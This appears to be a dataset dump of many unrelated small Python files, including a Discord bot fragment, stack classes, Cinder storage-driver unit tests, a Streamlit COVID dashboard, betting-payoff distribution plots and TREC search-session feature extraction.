#await bot.CH_bot_log.send(message_log_start + message_local if os.getenv("HEROKU_DEPLOYMENT") == "NO" else message_log_start + message_heroku)
@bot.event
async def on_member_join(member):
role = member.guild.get_role(892034791321518151)
print(role.name)
await member.add_roles(role)
# Load extensions and run the BOT
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
bot.load_extension(f'cogs.{filename[:-3]}')
print('f{filename} added')
bot.run(TOKEN) |
991,202 | fec1f43bf1eee599d2a701b644be8a2e226de7d3 | from .names import (
list_pvs, list_devices, list_elements, device_to_element, element_to_device
)
|
991,203 | a9a11ffd8c08a3fd1e0ef32f2d6e455aff1fab28 | arr = [17,18,5,4,6,1]
arr1 = []
for i in range(len(arr)-1):
arr1.append(max(arr[i+1:]))
arr1.append(-1)
print(arr1)
|
991,204 | 72f0d4ab78cc60bfb32339f8924de90b51e70c7c | def create_user(email, password, f_name, l_name):
"""check if email exists, hash the password, create user object, save to db"""
pass
def delete_user(id):
"""grab user from db, delete user"""
pass
def update_user(id):
"""grab user from db, update the users field, commit changes to db"""
pass
def get_user(id):
"""get user from db, return that user to controller"""
pass |
991,205 | 47326511e43b178ba1bc2a56c4cc3c8fbd0e2c3d | '''Step 1: Data Definition - Need to be able to pop/push values into a stack; also recognize when can no longer push/pop
Step 2: Signature - (int->int) input values into stack and output values
Step 3: Test Cases - self.assertTrue(s1.is_empty())
self.assertFalse(s1.is_empty())
self.assertTrue(s1.is_full())
self.assertFalse(s1.is_full())
self.assertEqual(s1.pop(), 1)
self.assertFalse(s1.pop())
self.assertEqual(s1.peek(), 3)
self.assertEqual(s1.size(), 2)'''
#Step 5: Body -
class Node:
def __init__(self, data=None, next_node=None): #
self.data = data
self.next_node = next_node
class StackLinked:
def __init__(self, capacity):
self.capacity = capacity
self.head = Node(None, None)
self.num_items = 0
def is_empty(self):
return self.num_items == 0
def is_full(self):
if self.num_items == self.capacity:
return True
else:
return False
def push(self, item):
if self.is_full():
raise IndexError('Stack is full.')
self.num_items += 1
temp = Node(item)
temp.next_node = self.head
self.head = temp
def pop(self):
if self.is_empty():
raise IndexError('Cant pop from empty stack.')
else:
self.num_items -= 1
temp = self.head.data
self = self.head.next_node
return temp
def peek(self):
return self.head.data
def size(self):
if self.is_empty():
return 0
else:
return self.num_items
class StackArray:
"""Implements an efficient last-in first-out Abstract Data Type using a Python List"""
def __init__(self, capacity):
"""Creates and empty stack with a capacity"""
self.capacity = capacity #this is example for list implementation
self.head = [None] * capacity #this is example for list implementation
self.num_items = 0 #this is example for list implementation
def is_empty(self): #checks to see if stack is empty or not
"""Returns true if the stack self is empty and false otherwise"""
if self.num_items == 0:
return True
else:
return False
def is_full(self): #checks to see if stack is full by comparing it to the capacity
"""Returns true if the stack self is full and false otherwise"""
if self.num_items == self.capacity:
return True
else:
return False
def push(self, item): #pushes values into stack
if self.is_full():
raise IndexError('Stack is full.')
self.num_items += 1
self.head[self.num_items - 1] = item
return self
def pop(self): #pops (LIFO) value from stack
if self.is_empty():
raise IndexError("Nothing to remove from stack.")
temp = self.head[self.num_items - 1]
self.head[self.num_items - 1] = None
self.num_items -= 1
return temp
def peek(self): #grabs top element in the stack without altering stack
if self.is_empty():
raise IndexError('Nothing to peek in the stack.')
else:
return self.head[self.num_items - 1]
def size(self): #returns the size or number of items in the stack
"""Returns the number of elements currently in the stack, not the capacity"""
if self.is_empty():
return 0
else:
return self.num_items
#Step 6: Run |
991,206 | 1c3bb554fb1e72b9a950c3496ee96314a19897c8 | class Vehicle():
def __init__(self, registration_no, drivers_age):
self.registration_no = registration_no
self.drivers_age = drivers_age
|
991,207 | 8450d1648d573fd5c82576db34d6f8bf7d771cb3 | #!/usr/bin/python3
from events.Events import Events
events = Events()
recorder = events.recorder()
@recorder.subscribe
def a(parent, text):
print('a prints: '+text)
@recorder.subscribe('a', 1)
def b(parent, text):
parent('b prepends: '+text)
#events.subscribe(a, 0)
#events.subscribe(b, 0, 'a')
events.invoke('a', 'hello')
recorder.unsubscribe_all()
events.invoke('a', 'hello')
|
991,208 | 1a3ccd7e8b4089f6391f855c666e0aa7da0c824a | def valor_maximo(lista):
vmax = 0
for i in range(0,len(lista)):
if lista[i] > vmax:
vmax = lista[i]
return vmax |
991,209 | 254c706d2459f9cde426e66b2178806b8e8c706b | #!/usr/bin/python3
"""This modules supports building CMake projects."""
_MAJOR = 0
_MINOR = 5
_PATCH = 0
_STRING = "{}.{}.{}".format(_MAJOR, _MINOR, _PATCH)
|
991,210 | b66c41a694e1ef83b1269b336e3f4b6df5ea4494 | from collections import deque
words = """
428a2f98 71374491 b5c0fbcf e9b5dba5 3956c25b 59f111f1 923f82a4 ab1c5ed5
d807aa98 12835b01 243185be 550c7dc3 72be5d74 80deb1fe 9bdc06a7 c19bf174
e49b69c1 efbe4786 0fc19dc6 240ca1cc 2de92c6f 4a7484aa 5cb0a9dc 76f988da
983e5152 a831c66d b00327c8 bf597fc7 c6e00bf3 d5a79147 06ca6351 14292967
27b70a85 2e1b2138 4d2c6dfc 53380d13 650a7354 766a0abb 81c2c92e 92722c85
a2bfe8a1 a81a664b c24b8b70 c76c51a3 d192e819 d6990624 f40e3585 106aa070
19a4c116 1e376c08 2748774c 34b0bcb5 391c0cb3 4ed8aa4a 5b9cca4f 682e6ff3
748f82ee 78a5636f 84c87814 8cc70208 90befffa a4506ceb bef9a3f7 c67178f2
"""
words = words.strip().replace("\n", " ").split(" ")
assert len(words) == 64
ops = deque("abcdefgh")
for x in range(0, 64):
if not x % 8:
print " // Round {}".format(x)
if x >= 16:
print " w{:02} = s1(w{:02}) + w{:02} + s0(w{:02}) + w{:02},".format(x & 0xf, (x - 2) & 0xf, (x - 7) & 0xf, (x - 15) & 0xf, (x - 16) & 0xf),
print " r({}, 0x{}, w{:02});".format(", ".join(ops), words[x], x & 0xf)
ops.rotate(1)
if not (x + 1) % 8:
print
|
991,211 | 5276fba23319f0450dc7e5ee2f892f075f7212e0 | # Copyright (c) 2017 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import unittest
import mock
from oslo_utils import units
from cinder import exception
from cinder.tests.unit.volume.drivers.dell_emc.unity import test_adapter
from cinder.volume.drivers.dell_emc.unity import utils
def get_volume_type_extra_specs(volume_type):
return {'provisioning:type': volume_type}
def get_volume_type_qos_specs(type_id):
if type_id == 'invalid_backend_qos_consumer':
ret = {'qos_specs': {'consumer': 'invalid'}}
elif type_id == 'both_none':
ret = {'qos_specs': {'consumer': 'back-end', 'specs': {}}}
elif type_id == 'max_1000_iops':
ret = {
'qos_specs': {
'id': 'max_1000_iops',
'consumer': 'both',
'specs': {
'maxIOPS': 1000
}
}
}
elif type_id == 'max_2_mbps':
ret = {
'qos_specs': {
'id': 'max_2_mbps',
'consumer': 'back-end',
'specs': {
'maxBWS': 2
}
}
}
else:
ret = None
return ret
def patch_volume_types(func):
@functools.wraps(func)
@mock.patch(target=('cinder.volume.volume_types'
'.get_volume_type_extra_specs'),
new=get_volume_type_extra_specs)
@mock.patch(target=('cinder.volume.volume_types'
'.get_volume_type_qos_specs'),
new=get_volume_type_qos_specs)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
return func_wrapper
class UnityUtilsTest(unittest.TestCase):
def test_validate_pool_names_filter(self):
all_pools = list('acd')
pool_names = utils.validate_pool_names(list('abc'), all_pools)
self.assertIn('a', pool_names)
self.assertIn('c', pool_names)
self.assertNotIn('b', pool_names)
self.assertNotIn('d', pool_names)
def test_validate_pool_names_non_exists(self):
def f():
all_pools = list('abc')
utils.validate_pool_names(list('efg'), all_pools)
self.assertRaises(exception.VolumeBackendAPIException, f)
def test_validate_pool_names_default(self):
all_pools = list('ab')
pool_names = utils.validate_pool_names([], all_pools)
self.assertEqual(2, len(pool_names))
pool_names = utils.validate_pool_names(None, all_pools)
self.assertEqual(2, len(pool_names))
def test_build_provider_location(self):
location = utils.build_provider_location('unity', 'thin', 'ev_1', '3')
expected = 'id^ev_1|system^unity|type^thin|version^3'
self.assertEqual(expected, location)
def test_extract_provider_location_version(self):
location = 'id^ev_1|system^unity|type^thin|version^3'
self.assertEqual('3',
utils.extract_provider_location(location, 'version'))
def test_extract_provider_location_type(self):
location = 'id^ev_1|system^unity|type^thin|version^3'
self.assertEqual('thin',
utils.extract_provider_location(location, 'type'))
def test_extract_provider_location_system(self):
location = 'id^ev_1|system^unity|type^thin|version^3'
self.assertEqual('unity',
utils.extract_provider_location(location, 'system'))
def test_extract_provider_location_id(self):
location = 'id^ev_1|system^unity|type^thin|version^3'
self.assertEqual('ev_1',
utils.extract_provider_location(location, 'id'))
def test_extract_provider_location_not_found(self):
location = 'id^ev_1|system^unity|type^thin|version^3'
self.assertIsNone(utils.extract_provider_location(location, 'na'))
def test_extract_provider_location_none(self):
self.assertIsNone(utils.extract_provider_location(None, 'abc'))
def test_extract_iscsi_uids(self):
connector = {'host': 'fake_host',
'initiator': 'fake_iqn'}
self.assertEqual(['fake_iqn'],
utils.extract_iscsi_uids(connector))
def test_extract_iscsi_uids_not_found(self):
connector = {'host': 'fake_host'}
self.assertRaises(exception.VolumeBackendAPIException,
utils.extract_iscsi_uids,
connector)
def test_extract_fc_uids(self):
connector = {'host': 'fake_host',
'wwnns': ['1111111111111111',
'2222222222222222'],
'wwpns': ['3333333333333333',
'4444444444444444']
}
self.assertEqual(['11:11:11:11:11:11:11:11:33:33:33:33:33:33:33:33',
'22:22:22:22:22:22:22:22:44:44:44:44:44:44:44:44', ],
utils.extract_fc_uids(connector))
def test_extract_fc_uids_not_found(self):
connector = {'host': 'fake_host'}
self.assertRaises(exception.VolumeBackendAPIException,
utils.extract_iscsi_uids,
connector)
def test_byte_to_gib(self):
self.assertEqual(5, utils.byte_to_gib(5 * units.Gi))
def test_byte_to_mib(self):
self.assertEqual(5, utils.byte_to_mib(5 * units.Mi))
def test_gib_to_mib(self):
self.assertEqual(5 * units.Gi / units.Mi, utils.gib_to_mib(5))
def test_convert_ip_to_portal(self):
self.assertEqual('1.2.3.4:3260', utils.convert_ip_to_portal('1.2.3.4'))
def test_convert_to_itor_tgt_map(self):
zone_mapping = {
'san_1': {
'initiator_port_wwn_list':
('200000051e55a100', '200000051e55a121'),
'target_port_wwn_list':
('100000051e55a100', '100000051e55a121')
}
}
ret = utils.convert_to_itor_tgt_map(zone_mapping)
self.assertEqual(['100000051e55a100', '100000051e55a121'], ret[0])
mapping = ret[1]
targets = ('100000051e55a100', '100000051e55a121')
self.assertEqual(targets, mapping['200000051e55a100'])
self.assertEqual(targets, mapping['200000051e55a121'])
def test_get_pool_name(self):
volume = test_adapter.MockOSResource(host='host@backend#pool_name')
self.assertEqual('pool_name', utils.get_pool_name(volume))
def test_ignore_exception(self):
class IgnoredException(Exception):
pass
def f():
raise IgnoredException('any exception')
try:
utils.ignore_exception(f)
except IgnoredException:
self.fail('should not raise any exception.')
def test_assure_cleanup(self):
data = [0]
def _enter():
data[0] += 10
return data[0]
def _exit(x):
data[0] = x - 1
ctx = utils.assure_cleanup(_enter, _exit, True)
with ctx as r:
self.assertEqual(10, r)
self.assertEqual(9, data[0])
def test_get_backend_qos_specs_type_none(self):
volume = test_adapter.MockOSResource(volume_type_id=None)
ret = utils.get_backend_qos_specs(volume)
self.assertIsNone(ret)
@patch_volume_types
def test_get_backend_qos_specs_none(self):
volume = test_adapter.MockOSResource(volume_type_id='no_qos')
ret = utils.get_backend_qos_specs(volume)
self.assertIsNone(ret)
@patch_volume_types
def test_get_backend_qos_invalid_consumer(self):
volume = test_adapter.MockOSResource(
volume_type_id='invalid_backend_qos_consumer')
ret = utils.get_backend_qos_specs(volume)
self.assertIsNone(ret)
@patch_volume_types
def test_get_backend_qos_both_none(self):
volume = test_adapter.MockOSResource(volume_type_id='both_none')
ret = utils.get_backend_qos_specs(volume)
self.assertIsNone(ret)
@patch_volume_types
def test_get_backend_qos_iops(self):
volume = test_adapter.MockOSResource(volume_type_id='max_1000_iops')
ret = utils.get_backend_qos_specs(volume)
expected = {'maxBWS': None, 'id': 'max_1000_iops', 'maxIOPS': 1000}
self.assertEqual(expected, ret)
@patch_volume_types
def test_get_backend_qos_mbps(self):
volume = test_adapter.MockOSResource(volume_type_id='max_2_mbps')
ret = utils.get_backend_qos_specs(volume)
expected = {'maxBWS': 2, 'id': 'max_2_mbps', 'maxIOPS': None}
self.assertEqual(expected, ret)
|
991,212 | d20bf077dc0ee794344bac80c8c3d3dceae762d7 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
from opps import social
install_requires = ["opps"]
classifiers = ["Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Framework :: Django",
'Programming Language :: Python',
"Programming Language :: Python :: 2.7",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
'Topic :: Software Development :: Libraries :: Python Modules']
try:
long_description = open('README.rst').read()
except:
long_description = social.__description__
setup(
name='opps-social',
namespace_packages=['opps', 'opps.social'],
version=social.__version__,
description=social.__description__,
long_description=long_description,
classifiers=classifiers,
keywords='social opps cms django apps magazines websites',
author=social.__author__,
author_email=social.__email__,
url='http://oppsproject.org',
download_url="https://github.com/opps/opps-social/tarball/master",
license=social.__license__,
packages=find_packages(exclude=('doc', 'docs',)),
package_dir={'opps': 'opps'},
install_requires=install_requires,
) |
991,213 | 96be9778f735b25acb9bd1b0afff60d7d7d02e06 | import pandas as pd
import matplotlib.pyplot as plt
df=pd.read_csv('DistanceRandom.csv', sep=',',header=None)
print(df)
data = []
data.append(0)
y = []
y.append(0)
columns = list(df)
for item in columns:
#print(df[item][0])
tmp = float(df[item][0])
if (tmp >= data[-1]):
data.append(tmp)
y.append(item)
plt.plot(y,data)
plt.show() |
991,214 | 9e86a1b54c42d5c8f212a138117f234b9d97a405 | import numpy as np
a=np.array([[1,2],[3,4],[5,6]])
print('array is',a)
##array is [[1 2]
## [3 4]
## [5 6]]
#print('未传递 Axis 参数。 在插入之前输入数组会被展开。' ,np.insert(a,3,[11,12]))
#在插入之前输入数组会被展开。 [ 1 2 3 11 12 4 5 6]
##print('沿轴 0 广播:' )
##print(np.insert(a,1,[11],axis = 0) )
##沿轴 0 广播:
##[[ 1 2]
## [11 11]
## [ 3 4]
## [ 5 6]]
##print('沿轴 1 广播:' )
##print(np.insert(a,1,11,axis = 1))
##array is [[1 2]
## [3 4]
## [5 6]]
##沿轴 1 广播:
##[[ 1 11 2]
## [ 3 11 4]
## [ 5 11 6]]
|
991,215 | e140574b193736bdadb9f71efcdcfb33a6c60ae8 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 29 16:32:41 2020
@author: Yuki-F
"""
from ._fir1 import fir1
from ._fir2 import fir2
from ._firls import firls
from ._firpm import firpm
from ._kaiserord import kaiserord
from ._sgolay import sgolay |
991,216 | d4cc45c5b58fb2ba405793cc37d59a79e9b6eb03 | from urllib.request import urlopen as request
import requests
import json
import streamlit as st
from pandas.io.json import json_normalize
import matplotlib.pyplot as plt; plt.rcdefaults()
import numpy as np
import pandas as pd
def autolabel(rects):
for rect in rects:
height = rect.get_height()
plt.text(rect.get_x() + rect.get_width()/2., int(height),
'%d' %int(height),
ha='center', va='bottom')
def getdata():
#get the data
url='https://coronavirus-tracker-api.herokuapp.com/v2/locations'
data=request(url)
#convert data from bytes to json
final_data=json.loads(data.read())
final_data=final_data['locations']
#sort the data ,using number of cases as the key
sorted_data=sorted(final_data,key=lambda k: k['latest']['confirmed'],reverse=True)
#convert data to dataframe
df=json_normalize(sorted_data)
df=df.drop(['coordinates.longitude','coordinates.latitude','last_updated','latest.recovered','id','country_code'],axis=1)
df.rename(columns = {'province':'Province','latest.deaths':'Deaths','latest.confirmed':'Confirmed Cases','country':'Country'}, inplace = True)
return df
def worldwides():
ogstatsurl='https://coronavirus-tracker-api.herokuapp.com/v2/latest'
#making get request to the API
client=request(ogstatsurl)
data=client.read()
client.close()
#bytes to json
final=json.loads(data)
#number of confirmed cases all around the world ---------variable name - confnum
confnum=final['latest']['confirmed']
confirmed='''## Confirmed Cases ``` %d``` '''%(confnum)
st.markdown(confirmed)
#number of deaths around the world ---------variable name -deathnum
deathnum=final['latest']['deaths']
deaths='''## Deaths ``` %d ``` '''%(deathnum)
st.markdown(deaths)
objects = ('Deaths', 'Total Cases')#labels for the bar chart
y_pos = np.arange(len(objects))
#active=int(confnum)-(int(recoverednum)+int(deathnum))#finding number of active cases
values = [int(deathnum),int(confnum)]#values for the bar chart
ax=plt.bar(y_pos, values, align='center', alpha=0.7)#bar chart ----plotted using matplotlib
plt.xticks(y_pos, objects)
# Additional data for the graph
plt.title('COVID-19')
autolabel(ax)
st.write(mpl_fig=ax)
st.pyplot()
st.set_option('deprecation.showPyplotGlobalUse', False)
df=getdata()
#getting the list of countries
country_list=df['Country'].tolist()
country_list=sorted(list(set(country_list)))
choice=st.selectbox('Choose Country',country_list)
#finding data related to specific country and displaying
value=df.loc[df['Country']==choice]
st.table(value)
#dsplaying all data
st.table(df)
return
|
991,217 | 47d019ed6bdad323438abb8a00ede24912e2b2f4 | # coding=utf-8
from django.contrib.auth.forms import UserCreationForm
from django import forms
from .models import Usuario
class UserAdminCreationForm(UserCreationForm):
class Meta:
model = Usuario
fields = ['username', 'email']
class UserAdminForm(forms.ModelForm):
class Meta:
model = Usuario
fields = ['username', 'email', 'nome', 'is_active', 'is_staff'] |
991,218 | 24bf83883a869c1f05c756ddd9142c37cf876d28 | #!/usr/bin/env python3
import os
from _decimal import Decimal
import time
from supplychainpy import simulate
from supplychainpy import model_inventory
__author__ = 'kevin'
def main():
start_time = time.time()
orders_analysis = model_inventory.analyse_orders_abcxyz_from_file(file_path="data.csv", z_value=Decimal(1.28),
reorder_cost=Decimal(5000), file_type="csv")
sim = simulate.run_monte_carlo(orders_analysis=orders_analysis.orders, runs=1, period_length=12)
sim_window = simulate.summarize_window(simulation_frame=sim, period_length=12)
sim_frame = simulate.summarise_frame(sim_window)
optimised = simulate.optimise_service_level(service_level=95.0, frame_summary=sim_frame,
orders_analysis=orders_analysis.orders, runs=1,
percentage_increase=1.30)
for s in optimised:
print(s.orders_summary())
end_time = time.time()
elapsed = end_time - start_time
print(elapsed)
if __name__ == '__main__':
main()
|
991,219 | 8db33282cfed02ed627d1a527f28acf57a3a0734 | import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
df = pd.read_csv('BetPayOff_WithCode.csv')
data = df.drop(['rawdatatype', 'gametype', 'website'], axis=1)
requiredata = data[data.loc[:, "code"] == 5902]
font = FontProperties(fname=r"c:\windows\fonts\simsun.ttc", size=14)
rawdata = requiredata.sort_values(by=['betamount']).dropna()
Total = rawdata['ct'].sum()
Average = (rawdata['betamount'] * rawdata['ct']).sum() / Total
Max = rawdata['betamount'].max()
Min = rawdata['betamount'].min()
rawdata.loc[:, 'ctratio'] = rawdata.loc[:, 'ct'] / Total
rawdata.loc[:, 'cumsum_ct'] = rawdata.loc[:, 'ctratio'].cumsum(axis=0)
#partition
partition = [0.5, 0.6, 0.7 , 0.87, 0.94, 0.95, 0.98, 1]
print(partition)
cumsum1 = rawdata[rawdata['cumsum_ct'] >= partition[0]]['betamount'].iloc[0]
cumsum2 = rawdata[rawdata['cumsum_ct'] >= partition[1]]['betamount'].iloc[0]
cumsum3 = rawdata[rawdata['cumsum_ct'] >= partition[2]]['betamount'].iloc[0]
cumsum4 = rawdata[rawdata['cumsum_ct'] >= partition[3]]['betamount'].iloc[0]
cumsum5 = rawdata[rawdata['cumsum_ct'] >= partition[4]]['betamount'].iloc[0]
cumsum6 = rawdata[rawdata['cumsum_ct'] >= partition[5]]['betamount'].iloc[0]
cumsum7 = rawdata[rawdata['cumsum_ct'] >= partition[6]]['betamount'].iloc[0]
cumsum8 = rawdata[rawdata['cumsum_ct'] >= partition[7]]['betamount'].iloc[0]
sep = [cumsum1, cumsum2, cumsum3, cumsum4, cumsum5, cumsum6, cumsum7, cumsum8]
print('Betamount切割點{}'.format(sep))
#plot 2D
fig, axes = plt.subplots(nrows=2, ncols=4)
plt.suptitle('Distribution of payoff conditioned on betamount of {}, where betamount has max = {}, min = {}, aver = {}'.format('BBIN糖果派對',Max,Min,Average), fontproperties=font)
cdf_betamount_cumsum1 = rawdata[rawdata['betamount'] <= cumsum1].sort_values(by=['payoff'])
denom1 = cdf_betamount_cumsum1['ct'].sum()
cdf_betamount_cumsum1.loc[:, 'cumsum1_ct'] = cdf_betamount_cumsum1.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum1['con_cdf'] = cdf_betamount_cumsum1.apply(lambda row: row.cumsum1_ct / denom1, axis=1)
cdf_betamount_cumsum1.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[0, 0])
axes[0,0].set_xlabel('payoff')
axes[0,0].set_ylabel('probability')
axes[0,0].set_title('P(payoff|betamount<{})'.format(cumsum1), fontproperties=font)
cdf_betamount_cumsum2 = rawdata[rawdata['betamount'] <= cumsum2].sort_values(by=['payoff'])
denom2 = cdf_betamount_cumsum2['ct'].sum()
cdf_betamount_cumsum2.loc[:, 'cumsum2_ct'] = cdf_betamount_cumsum2.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum2['con_cdf'] = cdf_betamount_cumsum2.apply(lambda row: row.cumsum2_ct / denom2, axis=1)
cdf_betamount_cumsum2.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[0, 1])
axes[0,1].set_xlabel('payoff')
axes[0,1].set_ylabel('probability')
axes[0,1].set_title('P(payoff|betamount<{})'.format(cumsum2), fontproperties=font)
cdf_betamount_cumsum3 = rawdata[rawdata['betamount'] <= cumsum3].sort_values(by=['payoff'])
denom3 = cdf_betamount_cumsum3['ct'].sum()
cdf_betamount_cumsum3.loc[:, 'cumsum3_ct'] = cdf_betamount_cumsum3.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum3['con_cdf'] = cdf_betamount_cumsum3.apply(lambda row: row.cumsum3_ct / denom3, axis=1)
cdf_betamount_cumsum3.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[0, 2])
axes[0,2].set_xlabel('payoff')
axes[0,2].set_ylabel('probability')
axes[0,2].set_title('P(payoff|betamount<{})'.format(cumsum3), fontproperties=font)
cdf_betamount_cumsum4 = rawdata[rawdata['betamount'] <= cumsum4].sort_values(by=['payoff'])
denom4 = cdf_betamount_cumsum4['ct'].sum()
cdf_betamount_cumsum4.loc[:, 'cumsum4_ct'] = cdf_betamount_cumsum4.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum4['con_cdf'] = cdf_betamount_cumsum4.apply(lambda row: row.cumsum4_ct / denom4, axis=1)
cdf_betamount_cumsum4.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[0, 3])
axes[0,3].set_xlabel('payoff')
axes[0,3].set_ylabel('probability')
axes[0,3].set_title('P(payoff|betamount<{})'.format(cumsum4), fontproperties=font)
cdf_betamount_cumsum5 = rawdata[rawdata['betamount'] <= cumsum5].sort_values(by=['payoff'])
denom5 = cdf_betamount_cumsum5['ct'].sum()
cdf_betamount_cumsum5.loc[:, 'cumsum5_ct'] = cdf_betamount_cumsum5.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum5['con_cdf'] = cdf_betamount_cumsum5.apply(lambda row: row.cumsum5_ct / denom5, axis=1)
cdf_betamount_cumsum5.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[1, 0])
axes[1,0].set_xlabel('payoff')
axes[1,0].set_ylabel('probability')
axes[1,0].set_title('P(payoff|betamount<{})'.format(cumsum5), fontproperties=font)
cdf_betamount_cumsum6 = rawdata[rawdata['betamount'] <= cumsum6].sort_values(by=['payoff'])
denom6 = cdf_betamount_cumsum6['ct'].sum()
cdf_betamount_cumsum6.loc[:, 'cumsum6_ct'] = cdf_betamount_cumsum6.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum6['con_cdf'] = cdf_betamount_cumsum6.apply(lambda row: row.cumsum6_ct / denom6, axis=1)
cdf_betamount_cumsum6.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[1, 1])
axes[1,1].set_xlabel('payoff')
axes[1,1].set_ylabel('probability')
axes[1,1].set_title('P(payoff|betamount<{})'.format(cumsum6), fontproperties=font)
cdf_betamount_cumsum7 = rawdata[rawdata['betamount'] <= cumsum7].sort_values(by=['payoff'])
denom7 = cdf_betamount_cumsum7['ct'].sum()
cdf_betamount_cumsum7.loc[:, 'cumsum7_ct'] = cdf_betamount_cumsum7.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum7['con_cdf'] = cdf_betamount_cumsum7.apply(lambda row: row.cumsum7_ct / denom7, axis=1)
cdf_betamount_cumsum7.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[1, 2])
axes[1,2].set_xlabel('payoff')
axes[1,2].set_ylabel('probability')
axes[1,2].set_title('P(payoff|betamount<{})'.format(cumsum7), fontproperties=font)
cdf_betamount_cumsum8 = rawdata[rawdata['betamount'] <= cumsum8].sort_values(by=['payoff'])
denom8 = cdf_betamount_cumsum8['ct'].sum()
cdf_betamount_cumsum8.loc[:, 'cumsum8_ct'] = cdf_betamount_cumsum8.loc[:, 'ct'].cumsum(axis=0)
cdf_betamount_cumsum8['con_cdf'] = cdf_betamount_cumsum8.apply(lambda row: row.cumsum8_ct / denom8, axis=1)
cdf_betamount_cumsum8.plot(x='payoff', y='con_cdf', kind='scatter', ax=axes[1, 3])
axes[1,3].set_xlabel('payoff')
axes[1,3].set_ylabel('probability')
axes[1,3].set_title('P(payoff|betamount<{})'.format(cumsum8), fontproperties=font)
plt.show() |
991,220 | f1f9d7395b928a2f7b55e63401d0bdaa19ffa107 | def sum_of_multiples(limit, factors=[3, 5]):
result = 0
while 0 in factors:
factors.remove(0)
for i in range(limit):
for f in factors:
if i % f == 0:
break
else:
continue
# If you've reached here, it's a multiple
result += i
return result
|
991,221 | d4fd01cc92ae0f5ece8f14aff83b699044de849b | import random
class Dinosaur:
def __init__(self, name):
self.name = name
self.health = 100
self.attacks = ('Smash', 'Slash', 'Bite')
self.attack_power = [30, 50, 70]
self.energy = 40
self.energy_drain = [0, 20, 30]
def attack(self, robot):
attack_choice = int(input(f'Choose your attack: 1. Smash 2. Slash 3. Bite'))
robot.health = robot.health - self.attack_power[attack_choice - 1]
self.energy = self.energy - self.energy_drain[attack_choice - 1]
def ai_attack(self, robot):
attack_choice = random.randint(0, 3)
robot.health = robot.health - self.attack_power[attack_choice - 1]
self.energy = self.energy - self.energy_drain[attack_choice - 1]
print(f'{robot.name} was hit for {self.attack_power[attack_choice - 1]} damage!') |
991,222 | aa7465408088a35ce3ec5ef044be4c409b63879e | """
(C) Copyright 2020
Scott Wiederhold, s.e.wiederhold@gmail.com
https://community.openglow.org
SPDX-License-Identifier: MIT
"""
if __name__ == '__main__':
import argparse
from gfhardware.cam import capture, GFCAM_LID, GFCAM_HEAD
parser = argparse.ArgumentParser(description='CaptureThread jpeg image from Glowforge camera.')
parser.add_argument('--head', action='store_true',
help='CaptureThread from head camera [default: lid camera]')
parser.add_argument('filename', action='store',
default="capture.jpeg", type=str,
nargs='?',
help='Specify output filename [default: capture.jpeg]')
parser.add_argument('exposure', action='store',
default=3000, type=int,
nargs='?',
help='Specify exposure [range: 0-65535, default: 3000]')
parser.add_argument('gain', action='store',
default=30, type=int,
nargs='?',
help='Specify gain [range: 0-1023, default: 30]')
args = parser.parse_args()
camera = GFCAM_LID
if args.head:
camera = GFCAM_HEAD
with open(args.filename, 'wb') as f:
f.write(capture(camera, args.exposure, args.gain))
|
991,223 | 5724b65b05d9d67aa551ec680003e531223ca167 | import pandas as pd
from tqdm import tqdm
tqdm.pandas()
from utils import peak, ave, end
Session_2014_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
'ClickCount', 'KeyDocCount', 'RelDocCount', 'AvgContent',
'TotalContent', 'AveClickRank', 'ClickDepth', 'SERPtime',
'RR', 'Clicks@3', 'Clicks@5', 'Clicks@5+', 'nDCG@3', 'nDCG@5',
'nDCG@10', 'Precision@3', 'Precision@5', 'Precision@10',
'Cost-Benefit-1', 'Cost-Benefit-1_1', 'Cost-Benefit-1_2',
'Cost-Benefit-2', 'Cost-Benefit-3']
Session_2014 = pd.read_csv('data/TREC-Session2014/Session2014_total_feature.csv')
Session_2014_past_peak_cols = []
Session_2014_past_end_cols = []
Session_2014_past_ave_cols = []
for col in tqdm(Session_2014_base_cols):
Session_2014[col+'_peak'] = Session_2014.progress_apply(peak, args=(Session_2014, col,), axis=1)
Session_2014[col+'_ave'] = Session_2014.progress_apply(ave, args=(Session_2014, col,), axis=1)
Session_2014[col+'_end'] = Session_2014.progress_apply(end, args=(Session_2014, col,), axis=1)
Session_2014_past_peak_cols.append(col+'_peak')
Session_2014_past_ave_cols.append(col+'_ave')
Session_2014_past_end_cols.append(col+'_end')
Session_2014.to_csv('data/TREC-Session2014/Session2014_total_feature.csv')
"""
=================================================================================================
Session_2013
=================================================================================================
"""
Session_2013_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
'ClickCount', 'KeyDocCount', 'RelDocCount', 'AvgContent',
'TotalContent', 'AveClickRank', 'ClickDepth', 'SERPtime',
